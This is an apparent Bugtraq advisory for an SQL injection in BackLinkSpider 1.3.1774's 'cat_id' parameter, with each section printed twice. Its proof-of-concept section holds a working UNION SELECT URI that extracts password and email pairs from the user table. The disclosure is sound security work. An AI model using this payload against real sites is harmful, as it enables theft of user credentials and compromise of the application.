BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
BID:40398
Info
BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 40398 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 27 2010 12:00AM |
| Updated: | May 27 2010 12:00AM |
| Credit: | sniper ip |
| Vulnerable: |
BackLinkSpider BackLinkSpider 1.3.1774 0 |
| Not Vulnerable: | |
Discussion
BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
BackLinkSpider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BackLinkSpider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
An attacker can exploit this issue through a browser.
The following example URI is available:
http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--
An attacker can exploit this issue through a browser.
The following example URI is available:
http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--
Solution / Fix
BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
BackLinkSpider 'cat_id' Parameter SQL Injection Vulnerability
References:
References:
- BackLinkSpider Homepage (BackLinkSpider )